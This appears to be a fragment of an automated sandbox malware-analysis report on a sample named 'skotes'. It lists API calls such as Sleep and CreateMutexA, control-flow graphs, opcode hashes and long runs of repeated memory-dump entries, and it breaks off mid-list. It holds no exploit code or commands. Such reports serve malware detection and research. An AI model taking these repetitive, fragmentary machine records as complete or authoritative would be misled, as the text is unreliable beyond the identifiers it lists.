                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: df3cd30188a48e52d971a9d678d69970343a7b86c04faad38836290688df94e6
                                                                                                                                            • Instruction ID: 4028fe59892d91a84e7b86f5586b0343250daef9f231a13a1e43bff9615cc193
                                                                                                                                            • Opcode Fuzzy Hash: df3cd30188a48e52d971a9d678d69970343a7b86c04faad38836290688df94e6
                                                                                                                                            • Instruction Fuzzy Hash: 1BE0CD3004010C6FCF357BE8C919E783B69EF5174DF014814FA1857222CB36ED41C640

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 1221b6466eb1f44c84d69ee8d1c4e91e9a7680defa12d114b87c38e1cf267ba0
                                                                                                                                            • Instruction ID: f244f3b6b920194dc7c4044424793ca727da7f91f5c8f8e7735b77295601ad1b
                                                                                                                                            • Opcode Fuzzy Hash: 1221b6466eb1f44c84d69ee8d1c4e91e9a7680defa12d114b87c38e1cf267ba0
                                                                                                                                            • Instruction Fuzzy Hash: 62314631B042049BEB08AB78DD89FAEBBB2EB95314F20825DE414E73E5C7759A818751

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 22 ac9f44-ac9f64 26 ac9f66-ac9f72 22->26 27 ac9f92-ac9fae 22->27 30 ac9f88-ac9f8f call add663 26->30 31 ac9f74-ac9f82 26->31 28 ac9fdc-ac9ffb 27->28 29 ac9fb0-ac9fbc 27->29 35 ac9ffd-aca009 28->35 36 aca029-aca916 call ad80c0 28->36 33 ac9fbe-ac9fcc 29->33 34 ac9fd2-ac9fd9 call add663 29->34 30->27 31->30 37 aca92b 31->37 33->34 33->37 34->28 42 aca01f-aca026 call add663 35->42 43 aca00b-aca019 35->43 39 aca953-aca994 Sleep CreateMutexA 37->39 40 aca92b call af6c6a 37->40 52 aca996-aca998 39->52 53 aca9a7-aca9a8 39->53 40->39 42->36 43->37 43->42 52->53 54 aca99a-aca9a5 52->54 54->53
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 52504d3e688d9a13232c32669a004c419c48cefcd7e9711793d5a71e57b342ee
                                                                                                                                            • Instruction ID: 582c6489f3d2d667d4fa269e838742c96a37c98a910e38c2a95d6112bee25d87
                                                                                                                                            • Opcode Fuzzy Hash: 52504d3e688d9a13232c32669a004c419c48cefcd7e9711793d5a71e57b342ee
                                                                                                                                            • Instruction Fuzzy Hash: 253179317002088BEB18ABB8DD89FADB7B2EB96714F20465DE419EB3D1C73599818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 56 aca079-aca099 60 aca09b-aca0a7 56->60 61 aca0c7-aca0e3 56->61 62 aca0bd-aca0c4 call add663 60->62 63 aca0a9-aca0b7 60->63 64 aca0e5-aca0f1 61->64 65 aca111-aca130 61->65 62->61 63->62 66 aca930 63->66 68 aca107-aca10e call add663 64->68 69 aca0f3-aca101 64->69 70 aca15e-aca916 call ad80c0 65->70 71 aca132-aca13e 65->71 74 aca953-aca994 Sleep CreateMutexA 66->74 75 aca930 call af6c6a 66->75 68->65 69->66 69->68 77 aca154-aca15b call add663 71->77 78 aca140-aca14e 71->78 86 aca996-aca998 74->86 87 aca9a7-aca9a8 74->87 75->74 77->70 78->66 78->77 86->87 88 aca99a-aca9a5 86->88 88->87
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: fdedf1e67e0e60a30f917954e4871d7b266bc58ac8bf0afc2d179ed1199f7268
                                                                                                                                            • Instruction ID: c45305d31733d38f3e6fb1b52a33cfa5890b3d232d6e634c3eb8a12b04303c66
                                                                                                                                            • Opcode Fuzzy Hash: fdedf1e67e0e60a30f917954e4871d7b266bc58ac8bf0afc2d179ed1199f7268
                                                                                                                                            • Instruction Fuzzy Hash: 6F316831B102089BEB089BB8DD85F7DF7B2EBA1318F24825DE414E73D5C73699818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 90 aca1ae-aca1ce 94 aca1fc-aca218 90->94 95 aca1d0-aca1dc 90->95 96 aca21a-aca226 94->96 97 aca246-aca265 94->97 98 aca1de-aca1ec 95->98 99 aca1f2-aca1f9 call add663 95->99 100 aca23c-aca243 call add663 96->100 101 aca228-aca236 96->101 102 aca267-aca273 97->102 103 aca293-aca916 call ad80c0 97->103 98->99 104 aca935 98->104 99->94 100->97 101->100 101->104 107 aca289-aca290 call add663 102->107 108 aca275-aca283 102->108 110 aca953-aca994 Sleep CreateMutexA 104->110 111 aca935 call af6c6a 104->111 107->103 108->104 108->107 120 aca996-aca998 110->120 121 aca9a7-aca9a8 110->121 111->110 120->121 122 aca99a-aca9a5 120->122 122->121
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
